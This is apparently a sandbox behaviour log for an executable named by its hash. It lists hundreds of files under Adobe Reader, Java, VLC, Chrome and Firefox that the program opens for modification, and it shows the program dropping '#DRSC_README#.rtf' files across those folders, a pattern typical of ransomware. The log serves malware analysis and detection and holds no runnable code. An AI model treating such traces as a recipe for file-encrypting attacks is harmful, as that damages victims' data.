710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\GRAY.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_psd.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_replace_signer_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\comment.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pl_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\rename.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\editpdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_cancel_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\editpdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfont.properties.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyFolder_160.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_tr_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvDX9.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jvm.lib 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\extcheck.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_thumbnailview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification 